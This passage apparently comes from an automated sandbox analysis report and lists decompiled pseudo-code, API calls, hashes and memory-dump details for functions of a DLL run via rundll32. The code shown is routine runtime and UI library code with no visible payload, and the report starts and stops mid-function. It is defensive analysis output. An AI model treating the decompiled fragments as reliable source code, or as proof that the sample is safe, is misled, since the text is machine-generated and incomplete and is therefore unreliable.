                                                                                                            • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				short _v72;
                                                                                                            				signed int _v76;
                                                                                                            				signed int _v80;
                                                                                                            				void** _v84;
                                                                                                            				signed int _v88;
                                                                                                            				intOrPtr _t52;
                                                                                                            				short* _t65;
                                                                                                            				void* _t74;
                                                                                                            				short* _t81;
                                                                                                            				void* _t86;
                                                                                                            				char* _t92;
                                                                                                            				signed int _t93;
                                                                                                            				signed int* _t95;
                                                                                                            				void** _t96;
                                                                                                            				signed int _t101;
                                                                                                            				signed int _t103;
                                                                                                            				void* _t106;
                                                                                                            
                                                                                                            				_t52 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t52;
                                                                                                            				_v84 = __ecx;
                                                                                                            				if(__ecx[1] != 0) {
                                                                                                            					_t95 = GlobalLock( *__ecx);
                                                                                                            					_v80 = 0 | _t95[0] == 0x0000ffff;
                                                                                                            					_v76 = E100246AB(_t95);
                                                                                                            					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
                                                                                                            					_v88 = _t101;
                                                                                                            					if(_v80 == 0) {
                                                                                                            						 *_t95 =  *_t95 | 0x00000040;
                                                                                                            					} else {
                                                                                                            						_t95[3] = _t95[3] | 0x00000040;
                                                                                                            					}
                                                                                                            					if(lstrlenA(_a4) < 0x20) {
                                                                                                            						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                            						_t65 = E1002472A(_t95);
                                                                                                            						_t86 = 0;
                                                                                                            						_t81 = _t65;
                                                                                                            						if(_v76 != 0) {
                                                                                                            							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
                                                                                                            						}
                                                                                                            						_t92 = _a4;
                                                                                                            						_t31 = _t81 + 3; // 0x3
                                                                                                            						_t33 = _t92 + 3; // 0x3
                                                                                                            						_t67 = _t86 + _t31 & 0xfffffffc;
                                                                                                            						_t103 = _t81 + _t33 & 0xfffffffc;
                                                                                                            						_v76 = _t86 + _t31 & 0xfffffffc;
                                                                                                            						if(_v80 == 0) {
                                                                                                            							_t93 = _t95[2];
                                                                                                            						} else {
                                                                                                            							_t93 = _t95[4];
                                                                                                            						}
                                                                                                            						if(_a4 != _t86 && _t93 > 0) {
                                                                                                            							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
                                                                                                            							_t106 = _t106 + 0xc;
                                                                                                            						}
                                                                                                            						 *_t81 = _a8;
                                                                                                            						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
                                                                                                            						_t96 = _v84;
                                                                                                            						_t96[1] = _t96[1] + _t103 - _v76;
                                                                                                            						GlobalUnlock( *_t96);
                                                                                                            						_t96[2] = _t96[2] & 0x00000000;
                                                                                                            						_t74 = 1;
                                                                                                            					} else {
                                                                                                            						_t74 = 0;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t74 = 0;
                                                                                                            				}
                                                                                                            				return E100117AE(_t74, _v8);
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLocklstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144527523-0
                                                                                                            • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                                                            • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
                                                                                                            				void* _v8;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				long* _t9;
                                                                                                            				long* _t11;
                                                                                                            				long _t17;
                                                                                                            				signed int _t25;
                                                                                                            				long* _t33;
                                                                                                            				long* _t36;
                                                                                                            				long* _t38;
                                                                                                            				long* _t39;
                                                                                                            				long _t47;
                                                                                                            				long _t50;
                                                                                                            				void* _t52;
                                                                                                            				long* _t53;
                                                                                                            				struct _OSVERSIONINFOA* _t54;
                                                                                                            				signed int _t56;
                                                                                                            				struct _OSVERSIONINFOA* _t58;
                                                                                                            
                                                                                                            				_t9 = _a8;
                                                                                                            				if(_t9 != 1) {
                                                                                                            					__eflags = _t9;
                                                                                                            					if(_t9 != 0) {
                                                                                                            						__eflags = _t9 - 2;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							__eflags = _t9 - 3;
                                                                                                            							if(_t9 == 3) {
                                                                                                            								E10015355(0);
                                                                                                            							}
                                                                                                            							L27:
                                                                                                            							_t11 = 1;
                                                                                                            							__eflags = 1;
                                                                                                            							L28:
                                                                                                            							return _t11;
                                                                                                            						}
                                                                                                            						_push(0x8c);
                                                                                                            						_push(1);
                                                                                                            						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
                                                                                                            						__eflags = _t53;
                                                                                                            						if(_t53 == 0) {
                                                                                                            							L24:
                                                                                                            							_t11 = 0;
                                                                                                            							goto L28;
                                                                                                            						}
                                                                                                            						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
                                                                                                            						_push(_t53);
                                                                                                            						if(__eflags == 0) {
                                                                                                            							E100107C8(__ebx, __edi, _t53, __eflags);
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						E1001518A();
                                                                                                            						_t17 = GetCurrentThreadId();
                                                                                                            						_t53[1] = _t53[1] | 0xffffffff;
                                                                                                            						 *_t53 = _t17;
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            					__eflags =  *0x1004f3c8 - _t9; // 0x0
                                                                                                            					if(__eflags <= 0) {
                                                                                                            						goto L24;
                                                                                                            					}
                                                                                                            					 *0x1004f3c8 =  *0x1004f3c8 - 1;
                                                                                                            					__eflags =  *0x1004f41c - _t9; // 0x1
                                                                                                            					if(__eflags == 0) {
                                                                                                            						E10011F67();
                                                                                                            					}
                                                                                                            					E1001634A();
                                                                                                            					E1001516D();
                                                                                                            					E10013AD4();
                                                                                                            					goto L27;
                                                                                                            				}
                                                                                                            				E10010B20(0x94, __ecx);
                                                                                                            				_t54 = _t58;
                                                                                                            				_t54->dwOSVersionInfoSize = 0x94;
                                                                                                            				if(GetVersionExA(_t54) == 0) {
                                                                                                            					goto L24;
                                                                                                            				}
                                                                                                            				_t47 = _t54->dwPlatformId;
                                                                                                            				 *0x1004f3e0 = _t47;
                                                                                                            				_t25 = _t54->dwMajorVersion;
                                                                                                            				 *0x1004f3ec = _t25;
                                                                                                            				_t50 = _t54->dwMinorVersion;
                                                                                                            				 *0x1004f3f0 = _t50;
                                                                                                            				_t56 = _t54->dwBuildNumber & 0x00007fff;
                                                                                                            				 *0x1004f3e4 = _t56;
                                                                                                            				if(_t47 != 2) {
                                                                                                            					 *0x1004f3e4 = _t56 | 0x00008000;
                                                                                                            				}
                                                                                                            				 *0x1004f3e8 = (_t25 << 8) + _t50;
                                                                                                            				if(E10013A83(1) != 0) {
                                                                                                            					if(E10015384() != 0) {
                                                                                                            						E1001678D(__eflags);
                                                                                                            						 *0x10050cb0 = GetCommandLineA();
                                                                                                            						 *0x1004f3cc = E1001666B();
                                                                                                            						_t33 = E1001614C();
                                                                                                            						__eflags = _t33;
                                                                                                            						if(_t33 < 0) {
                                                                                                            							L13:
                                                                                                            							E1001516D();
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            						_t36 = E100165C9();
                                                                                                            						__eflags = _t36;
                                                                                                            						if(_t36 < 0) {
                                                                                                            							L12:
                                                                                                            							E1001634A();
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_t38 = E10016396();
                                                                                                            						__eflags = _t38;
                                                                                                            						if(_t38 < 0) {
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						_t39 = E10011E29(0);
                                                                                                            						__eflags = _t39;
                                                                                                            						if(_t39 != 0) {
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						 *0x1004f3c8 =  *0x1004f3c8 + 1;
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					E10013AD4();
                                                                                                            				}
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                                                            • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                              • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 770256606-0
                                                                                                            • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                                                            • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				struct tagRECT _v40;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed char _t60;
                                                                                                            				signed char _t65;
                                                                                                            				intOrPtr _t67;
                                                                                                            				signed int _t73;
                                                                                                            				void* _t76;
                                                                                                            				intOrPtr _t83;
                                                                                                            				void* _t91;
                                                                                                            
                                                                                                            				_t91 = __eflags;
                                                                                                            				_t76 = __ecx;
                                                                                                            				_v24 = 1;
                                                                                                            				_v20 = 1;
                                                                                                            				_push(GetStockObject(0));
                                                                                                            				_t83 = E1002934F();
                                                                                                            				_v16 = _t83;
                                                                                                            				_v8 = E10033F2F(_t83, _t91);
                                                                                                            				_t60 =  *(_t76 + 0x74);
                                                                                                            				_v12 = _t83;
                                                                                                            				if((0x0000a000 & _t60) == 0) {
                                                                                                            					__eflags = _t60 & 0x00000050;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						_v24 = GetSystemMetrics(0x20) - 1;
                                                                                                            						_v20 = GetSystemMetrics(0x21) - 1;
                                                                                                            						_t65 =  *(_t76 + 0x78);
                                                                                                            						__eflags = 0x0000a000 & _t65;
                                                                                                            						if((0x0000a000 & _t65) == 0) {
                                                                                                            							L6:
                                                                                                            							__eflags = _t65 & 0x00000050;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								L9:
                                                                                                            							} else {
                                                                                                            								__eflags =  *(_t76 + 0x7c);
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L9;
                                                                                                            								} else {
                                                                                                            									goto L8;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							__eflags =  *(_t76 + 0x7c);
                                                                                                            							if(__eflags != 0) {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v12 = _v8;
                                                                                                            					} else {
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            				}
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_v20 = 0;
                                                                                                            					_v24 = 0;
                                                                                                            				}
                                                                                                            				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
                                                                                                            					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                                                            				}
                                                                                                            				_t95 =  *(_t76 + 0x24);
                                                                                                            				_t67 = _v8;
                                                                                                            				if( *(_t76 + 0x24) == 0) {
                                                                                                            					_t67 = _v16;
                                                                                                            				}
                                                                                                            				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                                                            				asm("movsd");
                                                                                                            				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                                                            				asm("movsd");
                                                                                                            				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                                                            				asm("movsd");
                                                                                                            				_t73 = 0 | _v12 == _v8;
                                                                                                            				asm("movsd");
                                                                                                            				 *(_t76 + 0x24) = _t73;
                                                                                                            				return _t73;
                                                                                                            			}



















                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3923860780-0
                                                                                                            • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                                                            • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002084F(void* __ecx, struct HWND__** _a4) {
                                                                                                            				struct HWND__** _v8;
                                                                                                            				struct HWND__** _v12;
                                                                                                            				long _t31;
                                                                                                            				struct HWND__** _t32;
                                                                                                            				struct HWND__** _t44;
                                                                                                            				struct HWND__** _t45;
                                                                                                            				long _t47;
                                                                                                            				void* _t49;
                                                                                                            				struct HWND__** _t63;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t49 = __ecx;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
                                                                                                            					_t31 = _a4;
                                                                                                            					if(_t31 != 0) {
                                                                                                            						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                                                                            							L4:
                                                                                                            							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
                                                                                                            							_v12 = _t32;
                                                                                                            							_a4 = _t32;
                                                                                                            							E10006D96( &_a4);
                                                                                                            							while(_a4 != 0) {
                                                                                                            								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                                                            								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                                                            								if((E1002049B(_t37) & 0x00020000) != 0) {
                                                                                                            									break;
                                                                                                            								} else {
                                                                                                            									_t45 = _v8;
                                                                                                            									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										L16:
                                                                                                            										_t44 = _v8;
                                                                                                            										goto L17;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							_a4 = _v12;
                                                                                                            							_t31 = E10006DAF( &_a4);
                                                                                                            							while(_a4 != 0) {
                                                                                                            								_t63 =  *(E10006DAF( &_a4));
                                                                                                            								_v8 = _t63;
                                                                                                            								if(_t63[2] == 0) {
                                                                                                            									L13:
                                                                                                            									_t31 = E1002049B(_t63);
                                                                                                            									if((_t31 & 0x00020000) == 0) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                                                                            										goto L16;
                                                                                                            									} else {
                                                                                                            										_t63 = _v8;
                                                                                                            										goto L13;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                                                                            							_t44 = _a4;
                                                                                                            							if(_t47 == 1) {
                                                                                                            								L17:
                                                                                                            								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                                                                            							} else {
                                                                                                            								goto L4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L18:
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t31;
                                                                                                            			}












                                                                                                            0x10020883
                                                                                                            0x10020888
                                                                                                            0x1002088b
                                                                                                            0x1002094d
                                                                                                            0x10020956
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002088b
                                                                                                            0x10020958
                                                                                                            0x10020958
                                                                                                            0x10020868
                                                                                                            0x1002095c

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 10020883
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 100208E8
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1002092D
                                                                                                            • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 10020956
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                                                            • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10026B4F(void* __ecx, signed int* _a4) {
                                                                                                            				char _v12;
                                                                                                            				struct _FILETIME _v20;
                                                                                                            				struct _FILETIME _v28;
                                                                                                            				char _v36;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* _t43;
                                                                                                            				long _t48;
                                                                                                            				signed int* _t51;
                                                                                                            				signed int* _t54;
                                                                                                            				signed int* _t57;
                                                                                                            				struct _FILETIME* _t67;
                                                                                                            				void* _t81;
                                                                                                            				CHAR* _t82;
                                                                                                            				signed int* _t83;
                                                                                                            				void* _t86;
                                                                                                            
                                                                                                            				_t83 = _a4;
                                                                                                            				_t81 = __ecx;
                                                                                                            				E10011C50(_t83, 0, 0x128);
                                                                                                            				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
                                                                                                            				_t43 =  *(_t81 + 4);
                                                                                                            				_t86 = _t43 -  *0x100401d4; // 0xffffffff
                                                                                                            				if(_t86 == 0) {
                                                                                                            					L12:
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				_t67 =  &_v12;
                                                                                                            				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
                                                                                                            					L4:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t48 = GetFileSize( *(_t81 + 4), 0);
                                                                                                            				_t83[6] = _t48;
                                                                                                            				_t83[7] = 0;
                                                                                                            				if(_t48 != 0xffffffff || 0 != 0) {
                                                                                                            					_t82 =  *(_t81 + 0xc);
                                                                                                            					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
                                                                                                            						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
                                                                                                            					} else {
                                                                                                            						_t83[8] = 0;
                                                                                                            					}
                                                                                                            					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
                                                                                                            					 *_t83 =  *_t51;
                                                                                                            					_t83[1] = _t51[1];
                                                                                                            					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
                                                                                                            					_t83[4] =  *_t54;
                                                                                                            					_t83[5] = _t54[1];
                                                                                                            					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
                                                                                                            					_t83[2] =  *_t57;
                                                                                                            					_t83[3] = _t57[1];
                                                                                                            					if(( *_t83 | _t83[1]) == 0) {
                                                                                                            						 *_t83 =  *_t57;
                                                                                                            						_t83[1] = _t57[1];
                                                                                                            					}
                                                                                                            					if((_t83[4] | _t83[5]) == 0) {
                                                                                                            						_t83[4] = _t83[2];
                                                                                                            						_t83[5] = _t83[3];
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1499663573-0
                                                                                                            • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                                                            • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1000C29A(void* _a4, intOrPtr _a8) {
                                                                                                            				char _v8;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				char _v56;
                                                                                                            				char _v60;
                                                                                                            				intOrPtr _t39;
                                                                                                            				intOrPtr* _t41;
                                                                                                            				intOrPtr* _t47;
                                                                                                            				intOrPtr _t48;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				intOrPtr _t58;
                                                                                                            				intOrPtr* _t60;
                                                                                                            				void* _t71;
                                                                                                            
                                                                                                            				_t71 = _a4 + 0xffffff2c;
                                                                                                            				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t58 = _a8;
                                                                                                            				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
                                                                                                            					L4:
                                                                                                            					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
                                                                                                            						__imp__#9(_t71 + 0xa8);
                                                                                                            						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
                                                                                                            						_push( &_a4);
                                                                                                            						_push(0x10043098);
                                                                                                            						_a4 = 0;
                                                                                                            						_push(_t41);
